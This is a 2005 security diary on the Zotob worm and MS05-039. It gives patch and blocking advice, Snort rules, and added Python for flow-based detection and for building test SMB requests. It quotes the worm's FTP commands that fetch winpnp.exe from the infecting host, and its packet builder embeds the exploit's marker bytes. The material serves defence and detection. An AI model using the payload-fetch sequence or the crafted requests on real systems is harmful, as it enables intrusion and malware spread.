MS05-039 Worm in the wild

Published: 2005-08-14
Last Updated: 2005-09-13 12:10:42 UTC
by Tony Carothers (Version: 1)
0 comment(s)

-039 is NOT Microsoft's lucky number

One of our readers, John Smith, submitted this:

"Interesting game of numbers:

SQL Slammer was using bug fixed in MS02-039

Zotob is using bug fixed in MS05-039

Hex 39 is 57 decimal, which is big W (Worm? Windows?) in ASCII."

Update (2005-08-15@10:43UTC): hex 39 is ASCII "9", but hex 57 is ASCII "W". Maybe it's a conspiracy involving the American National Standards Institute (ANSI)? OK, maybe not. -Josh

The technical details:

Starting around 11:30 UTC, we've received several reports on a new worm variant that makes use of MS05-039 to spread. If you're not patched yet, this is your last call.

F-Secure named the critter "Zotob.A": http://www.f-secure.com/weblog/

We've also received a submission of a binary called "pnpsrv.exe", which is recognized by ClamAV as Trojan.Spybot-123. Another reader has contributed evidence that a successful exploit by Zotob.A (or variant)

The worm downloads its main payload from the machine that infected it. Once a machine is infected, it starts its own FTP server and begins scanning for hosts with 445/tcp open. When it finds one, it uses the PnP exploit (MS05-039) to make the target download and execute the main payload over FTP from the infecting host.

Important facts so far:
- Patch MS05-039 will protect you.
- Windows XP SP2 and Windows 2003 cannot be exploited by this worm: on those platforms the vulnerable call requires a valid logon, and the worm does not use one.
- Blocking port 445 will protect you (but watch for already-infected systems on the inside, which scan and serve the payload from within).
- The FTP server does not run on port 21. It appears to pick a random high port.


Quick FTP log (the FTP client command sequence driven on the victim; IP address obfuscated):
  open aaa.bbb.ccc.ddd 31656
  user 1 1
  get winpnp.exe
  quit
That is: connect to the infecting host on a high port (31656 here), log in as user "1" with password "1", fetch winpnp.exe, disconnect. We'll keep adding to this diary as new information becomes available.
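The propagation pattern above (sweep 445/tcp, then have each newly exploited host connect back to a high port on the infecting machine for the FTP download) is something you can hunt for in flow data from the inside of a network where 445 is blocked at the perimeter. The following Python is an added example, not code from the diary or from any of the contributors; the flow records are constructed for illustration, and the thresholds are assumptions you would tune to your own network.

```python
from collections import defaultdict

# Constructed flow records: (timestamp, src_ip, dst_ip, dst_port). Not from the diary.
FLOWS = [
    # 10.0.0.7 sweeps 445/tcp across its subnet ...
    (1, "10.0.0.7", "10.0.0.20", 445),
    (1, "10.0.0.7", "10.0.0.21", 445),
    (2, "10.0.0.7", "10.0.0.22", 445),
    (2, "10.0.0.7", "10.0.0.23", 445),
    (3, "10.0.0.7", "10.0.0.24", 445),
    # ... and two of the swept hosts connect back to a high port on 10.0.0.7 (payload fetch)
    (4, "10.0.0.22", "10.0.0.7", 31656),
    (5, "10.0.0.24", "10.0.0.7", 31656),
    # 10.0.0.50 is an ordinary client talking to one file server
    (1, "10.0.0.50", "10.0.0.9", 445),
    (6, "10.0.0.50", "10.0.0.9", 445),
    # the file server answers on an ordinary port; it is not a scanner
    (7, "10.0.0.9", "10.0.0.50", 139),
]


def find_zotob_candidates(flows, min_targets=4, high_port=1024):
    """Flag hosts that both sweep 445/tcp and are then contacted on a high port
    by the hosts they swept (the infecting host's random-port FTP server).

    Returns {scanner: {"targets": n_hosts_probed, "callbacks": n, "ports": {...}}}.
    min_targets and high_port are assumed thresholds, not values from the diary.
    """
    targets = defaultdict(set)   # scanner -> hosts it probed on 445
    scan_time = {}               # (scanner, target) -> first probe timestamp
    for ts, src, dst, dport in flows:
        if dport == 445:
            targets[src].add(dst)
            scan_time.setdefault((src, dst), ts)

    hits = {}
    for ts, src, dst, dport in flows:
        # a swept host connecting back to its scanner on a high port, after the probe
        if dport > high_port and src in targets.get(dst, ()) and ts >= scan_time[(dst, src)]:
            entry = hits.setdefault(dst, {"targets": len(targets[dst]),
                                          "callbacks": 0, "ports": set()})
            entry["callbacks"] += 1
            entry["ports"].add(dport)

    return {h: v for h, v in hits.items() if v["targets"] >= min_targets}


if __name__ == "__main__":
    for host, info in find_zotob_candidates(FLOWS).items():
        print(host, info)
```

The two-stage check matters: a lone 445 sweep also describes vulnerability scanners and some management tools, and a lone high-port connection describes most peer traffic; it is the swept host calling back to its scanner on a non-21 port that matches the worm's FTP stage described above.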

Thanks so far to Johnathan Norman from Alert Logic for a lot of the details.
Other good information can be found at the F-Secure weblog at
http://www.f-secure.com/weblog/
Also see the Microsoft MS05-039 bulletin from last week: http://www.microsoft.com/technet/security/Bulletin/MS05-039.mspx
Please submit any new code captures via our contact page:
http://isc.sans.org/contact.php
If possible, do not pack/encrypt the uploads; provide an MD5 sum instead, so the code arrives in its original beauty.

Shown below are Snort rules, submitted by the members of the Alert Logic Security Research Team:
Jeremy Hewlett, Technical Director of Security Research
Johnathan Norman, Sr. Security Analyst
Chris Baker, Technical Director of Security Operations


alert tcp any any -> any 445 (msg:"EXPLOIT SMB-DS Microsoft Windows 2000 Plug and Play Vulnerability"; flow:to_server,established; content:"|FF|SMB%"; depth:5; offset:4; nocase; content:"|2600|"; depth:2; offset:65; content:"|67157a76|"; reference:url,www.microsoft.com/technet/security/Bulletin/MS05-039.mspx; classtype:attempted-admin; sid:1000130; rev:1;)

alert tcp any any -> any 139 (msg:"EXPLOIT NETBIOS SMB Microsoft Windows 2000 PNP Vuln"; flow:to_server,established; content:"|FF|SMB%"; depth:5; offset:4; nocase; content:"|2600|"; depth:2; offset:65; content:"|3600|"; offset:110; within:5; content:"|F6387A76|"; reference:url,www.microsoft.com/technet/security/Bulletin/MS05-039.mspx; classtype:attempted-admin; sid:1000131; rev:1;)

alert tcp any any -> any 445 (msg:"EXPLOIT NETBIOS SMB-DS Microsoft Windows 2000 PNP Vuln"; flow:to_server,established; content:"|FF|SMB%"; depth:5; offset:4; nocase; content:"|2600|"; depth:2; offset:65; content:"|3600|"; offset:110; within:5; content:"|F6387A76|"; reference:url,www.microsoft.com/technet/security/Bulletin/MS05-039.mspx; classtype:attempted-admin; sid:1000132; rev:1;)
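To see what those content matches actually pin down, here is an added Python example (not code from the diary or from Alert Logic) that builds a constructed SMB_COM_TRANSACTION / TransactNmPipe request carrying one DCE/RPC call and applies the checks of sid:1000132 to it byte for byte. Offsets are counted from the start of the TCP payload, i.e. including the 4-byte NetBIOS session header, which is what Snort sees: "|FF|SMB%" at offset 4 is the SMB signature plus command 0x25 (Trans); "|2600|" at offset 65 is the first Trans setup word, 0x0026 = TransactNmPipe; "|3600|" near offset 110 is the DCE/RPC opnum 0x36 = 54. The example assumes a Unicode-padded pipe name so that the DCE/RPC header lands at offset 88 (opnum at 88 + 22 = 110), reads the rule's `offset:110; within:5` as "the opnum word lies in the five bytes starting at 110", and treats 0xF6387A76 simply as a fixed constant from the public exploit; the page does not say what that value is.

```python
import struct

# What the content matches in sid:1000132 look for (offsets from start of TCP payload)
SMB_COM_TRANSACTION = 0x25        # "|FF|SMB%": '%' is SMB command 0x25 (Trans)
TRANS_TRANSACT_NMPIPE = 0x0026    # "|2600|" at offset 65: first Trans setup word
PNP_OPNUM = 0x36                  # "|3600|" at offset 110: DCE/RPC opnum 54
EXPLOIT_MARKER = bytes.fromhex("F6387A76")   # "|F6387A76|": constant from the public exploit
                                             # (assumed: a little-endian address; not stated on page)


def build_trans_nmpipe_request(opnum, stub, fid=0x4000):
    """Constructed SMB Trans / TransactNmPipe request carrying one DCE/RPC request PDU.
    Layout puts the DCE/RPC header at payload offset 88, so its opnum sits at 110."""
    smb_hdr = (b"\xffSMB" + bytes([SMB_COM_TRANSACTION]) + b"\x00" * 4   # status
               + b"\x18" + b"\x07\xc8"                                    # flags, flags2 (unicode)
               + b"\x00" * 12                                             # pid_high, signature, reserved
               + struct.pack("<HHHH", 0x0800, 0xfeff, 0x0800, 0x0040))   # tid, pid, uid, mid
    pdu = struct.pack("<BBBBIHHIIHH",
                      5, 0, 0, 0x03,          # ver 5.0, type 0 (request), first+last fragment
                      0x10,                   # data representation: little-endian
                      24 + len(stub), 0,      # frag_len, auth_len
                      1, len(stub),           # call_id, alloc_hint
                      0, opnum) + stub        # context id, opnum, then stub data
    pipe = "\\PIPE\\".encode("utf-16-le") + b"\x00\x00"     # 14 bytes, offsets 72..85
    params = struct.pack("<HHHHBBHIHHHHHBB",
                         0, len(pdu),          # total param/data count
                         0, 1024,              # max param/data count
                         0, 0,                 # max setup count, reserved
                         0, 0,                 # flags, timeout
                         0, 0, 84,             # reserved2, param count, param offset
                         len(pdu), 84,         # data count, data offset (from SMB header)
                         2, 0)                 # setup count, reserved3
    setup = struct.pack("<HH", TRANS_TRANSACT_NMPIPE, fid)   # offsets 65..68
    bytecount = 1 + len(pipe) + 2 + len(pdu)
    body = (smb_hdr + b"\x10" + params + setup + struct.pack("<H", bytecount)
            + b"\x00" + pipe + b"\x00\x00" + pdu)              # pad, name, pad to 4, PDU
    return b"\x00" + len(body).to_bytes(3, "big") + body       # NetBIOS session header


def matches_sid_1000132(payload):
    """Apply the four content matches of sid:1000132 to one TCP payload."""
    # content:"|FF|SMB%"; depth:5; offset:4; nocase
    if payload[4:9].upper() != b"\xffSMB%":
        return False
    # content:"|2600|"; depth:2; offset:65  -> TransactNmPipe
    if payload[65:67] != b"\x26\x00":
        return False
    # content:"|3600|"; offset:110; within:5  -> opnum 54 inside bytes 110..114
    if b"\x36\x00" not in payload[110:115]:
        return False
    # content:"|F6387A76|" with no modifiers -> anywhere in the payload
    return EXPLOIT_MARKER in payload


# Constructed stub data: a stand-in for the overflow buffer, and an ordinary call without it
EXPLOIT_STUB = b"A" * 40 + EXPLOIT_MARKER + b"A" * 8
BENIGN_STUB = b"\x00" * 48

if __name__ == "__main__":
    print(matches_sid_1000132(build_trans_nmpipe_request(PNP_OPNUM, EXPLOIT_STUB)))
    print(matches_sid_1000132(build_trans_nmpipe_request(PNP_OPNUM, BENIGN_STUB)))
```

Two caveats worth knowing before you deploy these. The first three matches are structural (Trans, TransactNmPipe, opnum 54) but nothing ties opnum 54 to the PnP interface, since the bind to that interface happens in an earlier request; it is the fourth match, the 0xF6387A76 constant, that keeps the rule from firing on any opnum-54 call over any pipe, and that same constant means a re-encoded or differently built exploit will not trigger it. Second, sid:1000130 has no opnum check at all and relies on its own constant (0x767a1567 little-endian), so it is the most likely of the three to be evaded or to misfire; sid:1000131 is the 139/tcp twin of sid:1000132.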

----------------
Handlers contributing to this diary so far:
Daniel Weseman, Johannes Ullrich, Tony Carothers, William Salusky and Donald Smith.
